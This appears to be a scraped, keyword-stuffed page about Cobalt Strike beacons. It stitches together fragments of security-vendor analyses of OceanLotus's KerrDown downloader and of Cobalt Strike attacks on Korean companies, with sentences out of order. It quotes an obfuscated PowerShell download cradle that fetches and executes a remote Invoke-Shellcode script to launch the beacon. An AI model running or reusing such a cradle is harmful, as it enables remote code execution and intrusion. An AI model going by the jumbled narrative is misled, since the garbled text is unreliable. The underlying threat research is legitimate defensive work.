![cobalt strike beacon dll source code cobalt strike beacon dll source code](https://bestestredteam.com/content/images/2019/05/image-16.png)
One is using the Microsoft Office Document with a malicious macro and the other is RAR archive which contains a legitimate program with DLL side-loading. For RAR archive files, the file names used to trick targets are all in Vietnamese as shown in Figure 11. Our analysis shows that the primary targets of the ongoing campaign discussed in this blog are either in Vietnam or Vietnamese speaking individuals. We identified two methods to deliver the KerrDown downloader to targets. This blog will cover a new custom downloader malware family we’ve named “KerrDown” which OceanLotus have been actively using since at least early 2018. We also show how the jaccard-index algorithm was used to quickly find similarities between the new KerrDown malware family within our datasets. This method has proven to be very useful to extract similarities from large sample datasets and connecting attack campaigns together. Given the large number of “KerrDown” samples found, we were also able to discern possible patterns in OceanLotus’ working hours and days of a week which is discussed in the later sections of this blog. Multiple attack campaigns have been reported by number of security organizations in the last couple of years, documenting the tools and tactics used by the threat actor. While OceanLotus’ targets are global, their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries, foreign governments, activists, and dissidents connected to Vietnam.
![cobalt strike beacon dll source code cobalt strike beacon dll source code](https://899029.smushcdn.com/2131410/wp-content/uploads/labs/2020/05/The-Anatomy-of-an-APT-Attack-and-CobaltStrike-Beacon’s-Encoded-Configuration-3.jpg)
– msvcruntime.OceanLotus (AKA APT32) is a threat actor group known to be one of the most sophisticated threat actors originating out of south east Asia.
Cobalt strike beacon dll source code download#
As of now, the page cannot be connected and is showing the ‘404 Not Found’ message, meaning the team is unable to download the beacon to check its information.ĪhnLab products are equipped with process memory-based detection method and behavior-based detection feature that can counter the beacon backdoor which is used from the Cobalt Strike’s initial invasion stage to spread internally. The C2 domain that the shellcode connects to is ‘ oxoocc’ on the bottom left. Thus, it is assumed that Cobalt Strike was installed through Invoke-Shellcode.ps1. As its name suggests, Invoke-Shellcode has the feature of downloading the shellcode payload through the parameter and executing it. The downloaded runtime.ps1 is actually Invoke-Shellcode.ps1, which is a powershell script provided by other powershell-based attack tools: PowerSploit and Empire. Powershell.exe “$dadf=’IEX(New-Object Net.WebClient).D’ $ien=’ownloadString (” hxxp://kr/api/runtime.ps1 ”)’ $nv3=’IEX(New-Object Net.WebClient).Do’ $qc=’wnloadString… (omitted) Svchost.exe -k LocalServiceNetworkRestrictedīefore the beacon process shown above was run, the following obfuscated powershell command line log was confirmed. This is a feature that is actually supported by the Cobalt Strike hacking tool.
![cobalt strike beacon dll source code cobalt strike beacon dll source code](https://user-images.githubusercontent.com/79333607/108551266-994e7600-72e7-11eb-8001-7246a7b56a10.png)
Cobalt Strike threat actors usually designate and run the normal process after giving it a specific parameter, and then inject the actual backdoor beacon to disguise the attack as a normal process. In this article, the team will examine the latest Cobalt Strike attacks which were confirmed after the publishing of the past article that introduced the Cobalt Strike hacking tool.Īn attack confirmed on April 23 revealed that the Cobalt Strike beacon was run by the process that possesses the command line shown below. The ASEC analysis team is monitoring attacks that utilize the Cobalt Strike hacking tool.
![cobalt strike beacon dll source code cobalt strike beacon dll source code](https://pentesttools.net/wp-content/uploads/2020/10/CobaltStrikeScan-Scan-Files-Or-Process-Memory-For-CobaltStrike-Beacons.png)
Posted on Cobalt Strike Targeting Korean Companies Being Distributed (Part 2)